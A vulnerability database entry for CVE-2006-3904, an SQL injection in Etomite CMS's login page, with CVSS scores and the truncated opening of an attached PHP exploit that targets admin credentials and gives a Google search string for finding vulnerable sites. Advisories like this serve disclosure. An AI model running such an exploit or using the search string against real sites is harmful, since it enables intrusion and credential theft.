6.8
CVSSv2

CVE-2006-3904

Published: 27/07/2006 Updated: 19/10/2017
CVSS v2 Base Score: 6.8 | Impact Score: 6.4 | Exploitability Score: 8.6
VMScore: 685
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in manager/index.php in Etomite CMS 0.6.1 and previous versions, with magic_quotes_gpc disabled, allows remote malicious users to execute arbitrary SQL commands via the username parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

etomite etomite 0.6

etomite etomite

Exploits

#!/usr/bin/php -q -d short_open_tag=on <? echo "Etomite CMS <= 061 (all patches applied) 'username' SQL injection / admin credentials disclosure\r\n"; echo "by rgod rgod@autisticiorg\r\n"; echo "site: retrogodaltervistaorg\r\n"; echo "google dork: \"Content managed by the Etomite Content Management System\"\r\n\r\n"; /* works wit ...